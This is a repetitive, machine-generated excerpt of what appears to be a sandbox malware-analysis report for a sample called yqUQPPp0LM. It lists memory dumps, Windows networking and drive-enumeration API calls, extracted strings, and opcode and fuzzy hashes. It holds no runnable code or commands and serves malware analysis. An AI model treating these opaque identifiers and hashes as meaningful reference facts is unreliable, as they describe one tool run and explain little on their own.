                                        • String ID: A:\$A:\
                                        • API String ID: 0-1047444362
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473058926.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7400000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: A:\$A:\
                                        • API String ID: 0-1047444362
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473058926.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7400000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: A:\$A:\
                                        • API String ID: 0-1047444362
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473058926.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7400000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: A:\$A:\
                                        • API String ID: 0-1047444362
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473058926.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7400000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: A:\$A:\
                                        • API String ID: 0-1047444362
                                        APIs
                                        • GetLogicalDrives.KERNELBASE ref: 07400330
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473058926.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7400000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID: DrivesLogical
                                        • String ID: A:\$A:\
                                        • API String ID: 999431828-1047444362
                                        APIs
                                        • GetLogicalDrives.KERNELBASE ref: 07400330
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473058926.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7400000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID: DrivesLogical
                                        • String ID: A:\$A:\
                                        • API String ID: 999431828-1047444362
                                        APIs
                                        • GetLogicalDrives.KERNELBASE ref: 07400330
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473058926.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7400000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID: DrivesLogical
                                        • String ID: A:\$A:\
                                        • API String ID: 999431828-1047444362
                                        APIs
                                        • GetLogicalDrives.KERNELBASE ref: 07400330
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473058926.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7400000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID: DrivesLogical
                                        • String ID: A:\$A:\
                                        • API String ID: 999431828-1047444362
                                        APIs
                                        • GetLogicalDrives.KERNELBASE ref: 07400330
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473058926.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7400000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID: DrivesLogical
                                        • String ID: A:\$A:\
                                        • API String ID: 999431828-1047444362
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2470058848.0000000000831000.00000040.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                        • Associated: 00000000.00000002.2470029910.0000000000830000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2470058848.0000000000F76000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2470058848.0000000000F78000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2470621313.0000000000F7B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2470638921.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2470638921.00000000010FE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2470638921.000000000120E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2470638921.0000000001218000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2470638921.00000000012F7000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2470638921.00000000012FF000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2470638921.000000000130D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2470960835.000000000130E000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2471155700.00000000014C4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2471175093.00000000014C6000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_830000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID: _open
                                        • String ID: terminated$@
                                        • API String ID: 4183159743-3016906910
                                        APIs
                                        • getsockname.WS2_32(?,?,00000080), ref: 0086A1C7
                                        Strings
                                        • getsockname() failed with errno %d: %s, xrefs: 0086A1F0
                                        • ssloc inet_ntop() failed with errno %d: %s, xrefs: 0086A23B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2470058848.0000000000831000.00000040.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_830000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID: getsockname
                                        • String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                                        • API String ID: 3358416759-2605427207
                                        APIs
                                        • WSAStartup.WS2_32(00000202), ref: 0084D65B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2470058848.0000000000831000.00000040.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                        • Associated: 00000000.00000002.2470029910.0000000000830000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2470058848.0000000000F76000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2470058848.0000000000F78000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2470621313.0000000000F7B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2470638921.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2470638921.00000000010FE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2470638921.000000000120E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2470638921.0000000001218000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2470638921.00000000012F7000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2470638921.00000000012FF000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2470638921.000000000130D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2470960835.000000000130E000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2471155700.00000000014C4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2471175093.00000000014C6000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_830000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID: Startup
                                        • String ID: if_nametoindex$iphlpapi.dll
                                        • API String ID: 724789610-3097795196
                                        • Opcode ID: 09df29c35a54ca4363dc1fc347145678228afbb3556606e0d135556b6a5db419
                                        • Instruction ID: aed7f89db8a9c29396f75f2f306b42dd7e0039e84661af934e2325ecef23b822
                                        • Opcode Fuzzy Hash: 09df29c35a54ca4363dc1fc347145678228afbb3556606e0d135556b6a5db419
                                        • Instruction Fuzzy Hash: 4D0126D0A4034A46EB51BB38AC173663594BB61304F8A1569EC8CD22D2F66DC58CC2E3
                                        APIs
                                        • GetLogicalDrives.KERNELBASE ref: 07400330
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473058926.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7400000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID: DrivesLogical
                                        • String ID: A:\
                                        • API String ID: 999431828-3379428675
                                        • Opcode ID: cdba037fc6516dc8629cf5f143ccce8040b13aa28227f080c927ff310ef7473d
                                        • Instruction ID: 0717afd15c9b3d4766ff799e82fe55d362fcd47b00b2d49f6a934cac79a226a1
                                        • Opcode Fuzzy Hash: cdba037fc6516dc8629cf5f143ccce8040b13aa28227f080c927ff310ef7473d
                                        • Instruction Fuzzy Hash: 3E41B2EB19C111BEB20290952B50BFB676EE5C7730B318C37F407C6692E2E44A4B51B1
                                        APIs
                                        • GetLogicalDrives.KERNELBASE ref: 07400330
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473058926.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7400000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID: DrivesLogical
                                        • String ID: A:\
                                        • API String ID: 999431828-3379428675
                                        • Opcode ID: dafcf914d567bc94394dc8cf4db3bf6b1bf0215ed39a659d9ff6204aab6c0e43
                                        • Instruction ID: 19ab0464fa50add99bd0a2803dd96990eedeb3144f51e7811cb28cfc0b8904ac
                                        • Opcode Fuzzy Hash: dafcf914d567bc94394dc8cf4db3bf6b1bf0215ed39a659d9ff6204aab6c0e43
                                        • Instruction Fuzzy Hash: 6941AFEB19C111BEB20290956B50BFB676EE5C7730B318C37F807D6692E2F44A4B11B2
                                        APIs
                                        • GetLogicalDrives.KERNELBASE ref: 07400330
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473058926.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7400000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID: DrivesLogical
                                        • String ID: A:\
                                        • API String ID: 999431828-3379428675
                                        • Opcode ID: d4f0c8db729da7061d60696b1df9de7e9753647359ae00cab5c1b601c374972b
                                        • Instruction ID: 53ce1ca34db2bee33ae317af966a019268865a5e7c57c3ef118081eb06b3b279
                                        • Opcode Fuzzy Hash: d4f0c8db729da7061d60696b1df9de7e9753647359ae00cab5c1b601c374972b
                                        • Instruction Fuzzy Hash: 2141E2EB19C110BEB202C5956B50BFA6B6EE5C7730B318C3BF407C6592E2F44A4B51B2
                                        APIs
                                        • GetLogicalDrives.KERNELBASE ref: 07400330
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473058926.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7400000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID: DrivesLogical
                                        • String ID: A:\
                                        • API String ID: 999431828-3379428675
                                        • Opcode ID: b84d0bbaed165ec9f10b6e888bae0313db308b7800e1e7df255aa07d90712775
                                        • Instruction ID: bfe5bac2d3bbd14eecfa4a9708e2ed9dbe33ebd753cf46d35dc5200d3d62125e
                                        • Opcode Fuzzy Hash: b84d0bbaed165ec9f10b6e888bae0313db308b7800e1e7df255aa07d90712775
                                        • Instruction Fuzzy Hash: 3831A0EB268111BEB202D0952B50BFB576EE5C7730B318C37F807C6692E2F44A4B51B5
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2470058848.0000000000831000.00000040.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_830000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID: CloseEvent
                                        • String ID: multi.c
                                        • API String ID: 2624557715-214371023
                                        • Opcode ID: ea2e8457b5f566a92a18b587357d857845c0f3fc0e5c4af0d6bb8fad9cd91201
                                        • Instruction ID: 6b031951b9be3cf26538f456aa34725193ac9310d33bc76e9aa017f1c8c81df9
                                        • Opcode Fuzzy Hash: ea2e8457b5f566a92a18b587357d857845c0f3fc0e5c4af0d6bb8fad9cd91201
                                        • Instruction Fuzzy Hash: E051B6B1D043045BDB21AA349C46B6776A8FF95318F084438EE89DA253FB75E909C7D3
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2470058848.0000000000831000.00000040.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_830000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID: closesocket
                                        • String ID: FD %s:%d sclose(%d)
                                        • API String ID: 2781271927-3116021458
                                        • Opcode ID: f068197789186e5b34984d8abce2638edde19864e555678dd105dffdea06e8da
                                        • Instruction ID: e1451b4f958875e01cb1fc97aa6d9c6a0e4e36fdde7118e0620e39cc7e5ce332
                                        • Opcode Fuzzy Hash: f068197789186e5b34984d8abce2638edde19864e555678dd105dffdea06e8da
                                        • Instruction Fuzzy Hash: FFD05E7290A2216B85306999AC49C9B7BA8EEC6F20F4A1868F845B7201D121DC4183E3
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2470058848.0000000000831000.00000040.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_830000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID: CloseHandle
                                        • String ID: R
                                        • API String ID: 2962429428-3347607022
                                        • Opcode ID: 3c49a51c62d4fa5bc90a7c1105c8815c242d91a63b928188b91db7164a8c87da
                                        • Instruction ID: ffb9b8e57195963e8e50f60bce3d4567200f51650e32531cfc97afc18ab1479b
                                        • Opcode Fuzzy Hash: 3c49a51c62d4fa5bc90a7c1105c8815c242d91a63b928188b91db7164a8c87da
                                        • Instruction Fuzzy Hash: F63172B49097059BCB00EFB8D58569EBBF4FF44344F008969E898E7341E774DA84CBA2
                                        APIs
                                        • connect.WS2_32(-00000028,-00000028,-00000028,-00000001,-00000028,?,-00000028,008FB29E,?,00000000,?,?), ref: 008FB0B9
                                        • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,00000000,0000000B,?,?,008E3C41,00000000), ref: 008FB0C1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2470058848.0000000000831000.00000040.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_830000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID: ErrorLastconnect
                                        • String ID:
                                        • API String ID: 374722065-0
                                        • Opcode ID: 1245406d7e153bb1f4c0acb5fc802036bb33423ac640ca5c5a491998a45f78be
                                        • Instruction ID: 9a300e5701a33bc2204953ff7267e86bd69ca5e31f421003fc1cb369750c70e6
                                        • Opcode Fuzzy Hash: 1245406d7e153bb1f4c0acb5fc802036bb33423ac640ca5c5a491998a45f78be
                                        • Instruction Fuzzy Hash: 8E01B1322046089BCA205A78C844E7BB399FBC9364F140724EA78E31E1DB26ED509B52
                                        APIs
                                        • gethostname.WS2_32(00000000,00000040), ref: 008E4AA4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2470058848.0000000000831000.00000040.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_830000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID: gethostname
                                        • String ID:
                                        • API String ID: 144339138-0
                                        • Opcode ID: 9e2d99afacd11771168f10953ae02f2fb37ac907298fb3f0b159366299a30f62
                                        • Instruction ID: 7789295ed373eae354d7b0dd44709339f585e0f9ed2a9ff6c7d746acaa395664
                                        • Opcode Fuzzy Hash: 9e2d99afacd11771168f10953ae02f2fb37ac907298fb3f0b159366299a30f62
                                        • Instruction Fuzzy Hash: 4D51D3705043808BE7309B66DD4972376E4FF86328F14283CD98ED66E2E7B4E844D706
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473021119.00000000073E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_73e0000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 5#\
                                        • API String ID: 0-280774400
                                        • Opcode ID: c13673bfd99c9618d52454dcbc03757c1797bd3e2be2bc545af537fa2f873744
                                        • Instruction ID: d858c1bc291a78b7eb762cb8ff8bf954676a41e16858edcd9977b8430be73074
                                        • Opcode Fuzzy Hash: c13673bfd99c9618d52454dcbc03757c1797bd3e2be2bc545af537fa2f873744
                                        • Instruction Fuzzy Hash: 8F5159EB15C125BD710A84826B24EFBA76EE1D7730B318437F80BE5A82E2D44E4E6131
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473021119.00000000073E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_73e0000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 5#\
                                        • API String ID: 0-280774400
                                        • Opcode ID: 9932e24e6f231ad7d35035f2a067a91967e97c5ded5af9d53c9fb8efa7f5fdcf
                                        • Instruction ID: e1f61d9328bbe0bdb3bd647dd9d19ee5a07ffcbbe934acbd872927305149dcd0
                                        • Opcode Fuzzy Hash: 9932e24e6f231ad7d35035f2a067a91967e97c5ded5af9d53c9fb8efa7f5fdcf
                                        • Instruction Fuzzy Hash: EF516CEB15C125BD720A84812F24EFBA76EE5D7730B318427F80BE5A82E2D44E4E5171
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473021119.00000000073E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_73e0000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 5#\
                                        • API String ID: 0-280774400
                                        • Opcode ID: 451d8784b69a5cdbab0d3d40fe2daf2d83ee996349a3d5a057b68af73de6f976
                                        • Instruction ID: fdd7e146916ae290d1a3cecff77673447eb8aaee735c3a2711a025d7bde0564f
                                        • Opcode Fuzzy Hash: 451d8784b69a5cdbab0d3d40fe2daf2d83ee996349a3d5a057b68af73de6f976
                                        • Instruction Fuzzy Hash: 03515CEB15C125BD714A84816F24EFBA76EE1D7730B318427F80BE5A82E2D44E4E5171
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473021119.00000000073E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_73e0000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 5#\
                                        • API String ID: 0-280774400
                                        • Opcode ID: 831b41056735e82cdc1beb025ec1af23077876c444c19ef862c99f3727d1590a
                                        • Instruction ID: 2db5b7c3a205b277f601117c0b31e74140bfdb2fc7d66e67657983cf7bc985a9
                                        • Opcode Fuzzy Hash: 831b41056735e82cdc1beb025ec1af23077876c444c19ef862c99f3727d1590a
                                        • Instruction Fuzzy Hash: B4515CEB15C125BD720A84816F24EFBA76EE1D7730B318437F80BE5A82E2D44E4D5171
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473021119.00000000073E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_73e0000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 5#\
                                        • API String ID: 0-280774400
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473021119.00000000073E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_73e0000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 5#\
                                        • API String ID: 0-280774400
                                        APIs
                                        • getsockname.WS2_32(?,?,00000080), ref: 008FAFD1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2470058848.0000000000831000.00000040.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_830000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID: getsockname
                                        • String ID:
                                        • API String ID: 3358416759-0
                                        APIs
                                        • send.WS2_32(?,?,?,00000000,00000000,?), ref: 008FA97F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2470058848.0000000000831000.00000040.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_830000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID: send
                                        • String ID:
                                        • API String ID: 2809346765-0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473021119.00000000073E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_73e0000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 5#\
                                        • API String ID: 0-280774400
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473021119.00000000073E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_73e0000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 5#\
                                        • API String ID: 0-280774400
                                        APIs
                                        • recv.WS2_32(000000FF,008E6F4E,000000FF,00000000,00000000,000000FF,008E6F4E,000000FF,?,00000000,?), ref: 008FA8AF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2470058848.0000000000831000.00000040.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_830000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID: recv
                                        • String ID:
                                        • API String ID: 1507349165-0
                                        APIs
                                        • socket.WS2_32(?,008FB280,00000000,-00000001,00000000,008FB280,?,?,00000002,00000011,?,?,00000000,0000000B,?,?), ref: 008FAF67
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2470058848.0000000000831000.00000040.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_830000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID: socket
                                        • String ID:
                                        • API String ID: 98920635-0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473021119.00000000073E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_73e0000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 5#\
                                        • API String ID: 0-280774400
                                        APIs
                                        • closesocket.WS2_32(?,008F9422,?,?,?,?,?,?,?,?,?,?,?,008E3377,00D0C880,00000000), ref: 008FB04D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2470058848.0000000000831000.00000040.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_830000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID: closesocket
                                        • String ID:
                                        • API String ID: 2781271927-0
                                        APIs
                                        • ioctlsocket.WS2_32(?,8004667E,?,?,0086AF56,?,00000001), ref: 008967FC
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2470058848.0000000000831000.00000040.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_830000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID: ioctlsocket
                                        • String ID:
                                        • API String ID: 3577187118-0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473021119.00000000073E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_73e0000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 5#\
                                        • API String ID: 0-280774400
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473021119.00000000073E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_73e0000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 5#\
                                        • API String ID: 0-280774400
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473021119.00000000073E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_73e0000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 5#\
                                        • API String ID: 0-280774400
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473021119.00000000073E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_73e0000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 5#\
                                        • API String ID: 0-280774400
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473021119.00000000073E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_73e0000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 5#\
                                        • API String ID: 0-280774400
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473021119.00000000073E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_73e0000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 5#\
                                        • API String ID: 0-280774400
                                        • Opcode ID: 48446f4f5bc994538ab5dc932122ae217a8e3fce583e214bb623d4ed43d166cc
                                        • Instruction ID: 05b4075ad3a50eaa0bfaeb537790e5a1146dfec928b6f8504216824e00d0b008
                                        • Opcode Fuzzy Hash: 48446f4f5bc994538ab5dc932122ae217a8e3fce583e214bb623d4ed43d166cc
                                        • Instruction Fuzzy Hash: 7A413CEB559125BDB20AC5816B24EFBA76EE2CB730B31C427F80BD5982E2D44E4D5131
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473021119.00000000073E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_73e0000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 5#\
                                        • API String ID: 0-280774400
                                        • Opcode ID: f16a53335b5b75283bac3a7942e84f264881f2406c061d6f1b0886b7bd6fb0ba
                                        • Instruction ID: e8a53d71bc5042bd78fdac1e3ac358a16426e98f2a49f814dbf63c3943e2d73e
                                        • Opcode Fuzzy Hash: f16a53335b5b75283bac3a7942e84f264881f2406c061d6f1b0886b7bd6fb0ba
                                        • Instruction Fuzzy Hash: 973170EB159129BDB10A85816F24EFBA76EE2CB730B31C426F80BE5981E2D44F4E5131
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473021119.00000000073E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_73e0000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 5#\
